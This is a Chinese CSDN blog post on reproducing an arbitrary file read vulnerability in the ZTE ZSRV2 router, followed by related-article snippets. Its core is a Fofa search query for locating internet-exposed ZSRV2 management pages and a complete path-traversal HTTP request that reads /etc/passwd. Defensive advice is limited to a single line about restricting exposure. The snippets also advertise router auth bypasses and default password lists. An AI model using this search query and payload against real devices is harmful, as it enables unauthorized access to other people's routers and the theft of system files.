中兴ZSRV2路由器 任意文件读取

最新推荐文章于 2024-09-02 11:02:50 发布
最新推荐文章于 2024-09-02 11:02:50 发布
阅读量588 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/141717378
版权

0x01 漏洞描述:

中兴 ZSRV2路由器 存在文件读取漏洞。

资产图

0x02 搜索语句:

Fofa:title="ZSRV2路由器Web管理系统"

0x03 漏洞复现:

GET /css//../../../../../../../../etc/passwd HTTP/1.1
Host: your-ip

 

0x04 修复建议:

关闭互联网暴露面或接口设置访问权限

中兴 H108NS 路由器 tools_admin.asp权限绕过漏洞复现
0xSec
12-14 931
中兴H108NS路由器tools_admin.asp接口处存在身份认证绕过漏洞,攻击者可利用该漏洞绕过身份认证允许访问路由器的管理面板修改管理员密码,获取用户的敏感信息。
ZXR10 ZSR V2系列路由器产品彩页(国内政企网)_20170601.pdf
07-18
ZXR10 ZSR V2路由器中兴通讯推出的集路由、交换、无线、安全、、AC于一体的下一代智能接入路由器产品, 产品采用了业界领先的硬件平台与软件架构,为构建高效、可靠、灵活、易维的企业智慧网络提供了智能而有弹性的设备平台。 ZXR10 ZSR V2路由器目前推出了ZXR10 1800-2S、2800-4、3800-8、1800-2E、2800-3E(L)、2800-3E以及 160固定盒式等多款产品,分别可提供2/4/8/2/3/3/0个通用业务接口插槽,转发性能包括2Mpps~45Mpps,可广泛灵活的 应用于政企网络的出口网关、企业的总部/分支接入、移动办公室、金融网点、行业网的汇聚/接入等网络。
中兴-ZSRV2路由器-任意文件读取
一个努力学习网安的小牛马
09-02 891
中兴任意文件读取
Lib20171207085832-ZXR10 ZSR V2(V4.00.10)用户手册文档包(运营商)_R1.0_834853.zed
08-06
中兴zxr10 路由器配置文档,需下载zed阅读器悦读,文档写的比较烂,没办法,中兴就这样,大家忍忍吧。
C# 路由器WEB管理自动登录
09-06
C# 路由器WEB管理自动登录,基于这个功能,可以实现路由器管理的其他二次开发。 使用示例代码请更改管理用户名和密码,及路由器IP和网页编码
十、路由器Web漏洞原理
wanhex的博客
03-07 1023
前面的文稿中我们提到过,家用路由器一般都带有Web管理服务,用户可以通过Web管理页面进行路由器的管理和配置。既然存在Web管理服务,那么常见针对Web漏洞的攻击手段(诸如XSS、CSRF)等,同样可以运用在针对路由器的攻击中。 XSS 第一种常见的漏洞类型是XSS漏洞,英文全称是Cross Site Scripting,即跨站脚本攻击,显然重点词汇是“Script”,在网页代码中,这个脚本一般...
中兴ZSRV2路由器怎么使用、
最新发布
03-14
中兴 ZSRV2 是一款高性能的企业级路由器,广泛应用于中小型企业的网络部署场景。该设备支持多种路由协议以及丰富的业务功能,能够满足复杂的组网需求[^1]。 #### 初始配置准备 在开始配置之前,请确认以下事项已...
普通路由默认密码
12-03
普通路由默认密码,全部为国产路由器的密码
ZXR10 5200E性能优化手册:5个关键步骤助你提升网络效率
[ZXR10 5200E性能优化手册:5个关键步骤助你提升网络效率](https://www.zte.com.cn/content/dam/zte-site/res-www-zte-com-cn/mediares/zte/global/productimages/zsrv2_g/ZSR_V2.jpeg) # 摘要 本文全面探讨了ZXR10...
CentOS项目实例之三(二)--ZZSRV2上DNS配置
weixin_34184158的博客
09-28 91
1.ZZSRV2上的DNS配置1.1.安装BIND与ZZSRV1上的主DNS配安装一样。1.2.配置1.2.1.CacheOnlyServer与ZZSRV1上的主DNS配安装一样。1.2.2.添加辅助Zone#vi/etc/named.conf 添加如下zone信息 zone"bigcloud.local"IN{ typeslave;...
( ZXR10 ZSR(V2.8.11)智能集成多业务路由器用户手册(WEB GUI分册)
08-20
ZXR10 ZSR(V2.8.11)智能集成多业务路由器用户手册 界面配置,容易操作
Lerx网站管理系统 V2 软件
04-22
Lerx网站管理系统 V2 网站例子
华为交换机路由器最新默认密码大全
热门推荐
收集盒 Book box
11-01 15万+
华为交换机路由器最新默认密码大全包括console、telnet、web、bootrom登陆,框式与合式设备,是目前最全的密码大全 版本 缺省用户名 缺省密码 缺省级别(级) Console口/telnet登录(框式&盒式) V1R3C00 无 无 无 V1R5C
路由器默认密码
FreeXploiT
11-04 3891
3COM CellPlex 7000 Telnet tech tech 3COM CoreBuilder 7000/6000/3500/2500 Telnet debug synnet 3COM CoreBuilder 7000/6000/3500/2500 Telnet tech tech 3COM HiPerARC v4.1.x Telnet adm (none) 3COM LANplex 2
品牌路由器登陆名和密码
weizi422的专栏
11-02 2396
品牌 产品名称 版本 协议 帐户名 口令 等级 其他 3COM CellPlex 7000 Telnet tech tech 3COM CoreBuilder 7000/6000/3500/2500 Telnet debug synnet 3COM CoreBuilder 7000/6000/3500/2500 Telnet tech tech 3COM HiPerARC v4.1.x Telne
微信多业务 - 消息转发多业务
weixin_34288121的博客
06-11 168
         他做了一个微信开发个月,最近推出的微信客户服务能力.由于公司的公众微信号码认证,因此,有一个接口的权限.就在这个整合项目,本文仅适用于微通道的基础上发展. 见微信开发文档 假设公众号处于开发模式,须要在接收到用户发送的消息时,返回一个MsgType为transfer_customer_service的消息。微信server在收到这条消息时。会把这次发送的消息转...
中兴路由器中直连路由的配置
T.machine的博客
11-25 3331
一、实验目的 1、掌握中兴1800路由器的工作原理。 2、熟练掌握直连路由的配置过程。 二、实验内容 1、绘制拓扑图,根据拓扑图进行试验; 2、对路由器进行配置,并最终验证网络的连通性。 三、实验过程 1、实验任务说明 1、配置直连路由,使两个不同网段的PC可以互通; 2、查看配置端口状态和路由表信息,并给出说明。 2、业务配置流程图 3、实验配置过程 zxr10&g...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iSee857

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值